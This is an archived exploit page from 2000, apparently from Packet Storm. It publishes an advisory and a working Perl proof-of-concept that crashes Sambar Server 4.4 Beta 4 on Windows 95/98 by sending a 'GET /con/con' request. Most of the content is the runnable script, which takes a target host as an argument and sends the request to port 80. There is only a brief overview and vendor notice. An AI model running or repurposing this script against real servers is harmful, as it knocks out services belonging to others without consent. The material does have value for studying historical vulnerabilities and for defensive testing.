exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dae_sambar44.pl

dae_sambar44.pl
Posted Nov 12, 2000
Authored by Daemon-root | Site daemon-root.da.ru

The Sambar Server v4.4 Beta 4 for Windows 95/NT is vulnerable to a remote denial of service attack due to the con/con bug. Perl proof of concept code included.

tags | exploit, remote, denial of service, perl, proof of concept
systems | windows
SHA-256 | 55be48679e17a74e5287e6a851ca595e4a6e8b5e87adc6609febe7527a7324fa

dae_sambar44.pl

Change Mirror Download
daemon-root's security research 
Advisory Name: dae_sambar44b4
Release Date: 10 November 2000
Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
Platform: Windows 95, 98
Severity: The server is still vulnerable for the infamous /con/con exploit
Author: daemon-root (daemon_r00t@secureroot.com)
Web: http://www.daemon-root.da.ru


Overview:

Sambar Server is a free, multithreaded HTTP server for Windows 95/NT.
Its features include HTTP proxy, search engine, log analysis, security,
server-side scripting, and DLLs. This program includes an unbuffered CGI support,
native FTP proxy, a sacrypt encryption utility, and significantly faster
full-text indexing, yet it's still vulnerable for the infamous /con/con exploit
such as in the previous versions of Sambar Server.


Proof of concept code:

[dae_sambar44.pl]

# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY!

use IO::Socket;

print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
print "=================================================\n";
if (not $ARGV[0]) {
print "Usage: $0 [host]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$exploit .= "/con/con";
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "GET $exploit HTTP/1.0\n";
print "close connection...\n";
close $host;

[END OF dae_sambar44.pl]

Vendor status:

The vendor has been informed on 10 november 2000.
______________________________________________________________
daemon-root's security research - http://www.daemon-root.da.ru


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close